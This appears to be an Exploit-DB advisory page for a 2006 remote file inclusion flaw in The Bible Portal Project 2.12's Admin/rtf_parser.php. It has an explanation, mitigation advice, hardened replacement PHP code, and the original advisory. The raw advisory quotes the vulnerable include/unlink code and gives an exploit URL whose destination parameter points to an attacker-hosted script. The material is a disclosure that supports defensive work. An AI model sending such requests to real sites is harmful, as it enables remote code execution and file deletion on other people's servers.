Vendor: The Bible Portal Project (destination)
By: Kacper (a.k.a Rahim)
CVSS: 9.3 (HIGH)
CWE: CWE-98 (Remote File Include)
Product Name: The Bible Portal Project (destination)
Affected Version From: 2.12
Affected Version To: 2.12
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

The Bible Portal Project (destination) <= 2.12 Remote File Include Vulnerability

The Bible Portal Project (destination) up to and including version 2.12 contains a remote file include in Admin/rtf_parser.php. The script builds a path from the destination request parameter and passes it, with .txt appended, straight to include() (and afterwards to unlink()) without any validation. A request of the form shown in the raw advisory below, with destination set to a URL on an attacker-controlled host, makes PHP fetch that file over HTTP and run it as PHP code under the web server account. Preconditions a tester should confirm: remote includes need allow_url_fopen (PHP before 5.2) or allow_url_include (PHP 5.2 and later) to be enabled; the quoted fragment does not show where $destination is assigned, so it is populated either through register_globals or through an earlier assignment from the request; and because .txt is appended, the payload has to be served under that suffix (or the URL ends in ? so the suffix lands in the query string). The same unvalidated value reaching unlink() also means the script deletes whatever .txt path the caller names, as far as the web server account is permitted to.

Mitigation:

Upgrade to a release later than 2.12 (the vendor has published a fix). Independently of the upgrade, the include in Admin/rtf_parser.php should not take its file name from the request at all: generate the temporary file name server-side, resolve it inside a fixed directory, and read it back as data instead of passing it to include(). As defence in depth on the PHP side, set allow_url_include=Off (and allow_url_fopen=Off where nothing needs it) and register_globals=Off, so that a stray include of a request value cannot fetch a remote script; an unvalidated value should also never reach unlink().
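The following is an added example, not the vendor's patch and not code from the advisory author: a hardened replacement for the write / include / unlink sequence quoted from Admin/rtf_parser.php in the raw advisory further down. It illustrates both the flaw described above (a request value flowing into include()) and the mitigation (server-generated temp name, read as data, HTML-escaped). The function names render_parsed_rtf() and safe_destination() and the $tmp_dir argument are assumptions; $read, $add_form, $add_form1 and $html_guide are the original script's own variables.

```php
<?php
// Added example, not the vendor's patch or the advisory author's code:
// a hardened replacement for the write / include / unlink sequence quoted
// from Admin/rtf_parser.php. Assumed names: render_parsed_rtf(),
// safe_destination() and the $tmp_dir argument. $read, $add_form,
// $add_form1 and $html_guide are the original script's own variables.
declare(strict_types=1);

/**
 * Render the already-converted RTF text ($read) as HTML.
 *
 * What changes compared with the vulnerable fragment:
 *  1. The temporary file name comes from tempnam() inside a fixed
 *     directory; nothing from the request reaches the path, so neither a
 *     remote URL nor a local path can be injected.
 *  2. The file is read back with file_get_contents(), not include(), so its
 *     content is data and is never executed as PHP.
 *  3. The unlink() only ever removes the file this function created.
 *  4. The output is HTML-escaped.
 */
function render_parsed_rtf(string $read, string $tmp_dir): string
{
    $real_dir = realpath($tmp_dir);
    if ($real_dir === false || !is_dir($real_dir)) {
        throw new RuntimeException('temporary directory is not available');
    }

    // tempnam() silently falls back to the system temp dir when $real_dir is
    // not writable; verify the file really landed where we expect.
    $path = tempnam($real_dir, 'rtf');
    $real_path = ($path === false) ? false : realpath($path);
    if ($real_path === false
        || strpos($real_path, $real_dir . DIRECTORY_SEPARATOR) !== 0) {
        if ($path !== false) {
            unlink($path);
        }
        throw new RuntimeException('could not create temporary file in the expected directory');
    }

    try {
        file_put_contents($real_path, trim($read) . "\n");
        $text = (string) file_get_contents($real_path);   // data, not code
    } finally {
        unlink($real_path);
    }

    return '<pre>' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</pre>';
}

/**
 * If a client-supplied name must be kept (e.g. to find a file written by an
 * earlier step), accept only a short token of safe characters and resolve
 * it inside $tmp_dir. Returns the full path, or null when the value is
 * rejected: "http://host/x", "../etc/passwd" and anything containing a
 * slash, colon, dot or NUL byte all fail the pattern.
 */
function safe_destination(string $candidate, string $tmp_dir): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $candidate)) {
        return null;
    }
    $real_dir = realpath($tmp_dir);
    if ($real_dir === false || !is_dir($real_dir)) {
        return null;
    }
    return $real_dir . DIRECTORY_SEPARATOR . $candidate . '.txt';
}

// Usage in the page, in place of the include"$destination.txt" block
// (the surrounding form and guide output is unchanged):
//
//   echo $add_form;
//   echo render_parsed_rtf($read, __DIR__ . '/tmp');
//   echo "\n$add_form1\n$html_guide\n";
```

Even when safe_destination() is used to keep a client-chosen name, the path it returns is meant to be read with file_get_contents() or readfile(); it should never be handed to include(), because a file written from RTF input could still contain PHP tags.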

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  The Bible Portal Project (destination) <= 2.12 Remote File Include Vulnerability
$$  script site: http://www.bibleportalproject.com/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Special greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

#rtf_parser.php:
/*
$read = preg_replace("/~ulnone/", "", $read);
$read = preg_replace("/~line/", "\n\n", $read);   // multi-line string literal in the original source, joined here
$read = trim($read);

fwrite($file, "$read\n");
fclose($file);


include"WeBelieveAEForm.inc";

echo"$add_form";
include"$destination.txt";          // RFI sink: $destination is request-controlled, ".txt" is appended
echo"
$add_form1
$html_guide
";
unlink("$destination.txt");         // the same unvalidated value reaches unlink()
*/
#Expl:


http://www.site.com/[tbpp_path]/Admin/rtf_parser.php?destination=[evil_scripts]


#Greetings to everyone ;-)

# milw0rm.com [2006-06-14]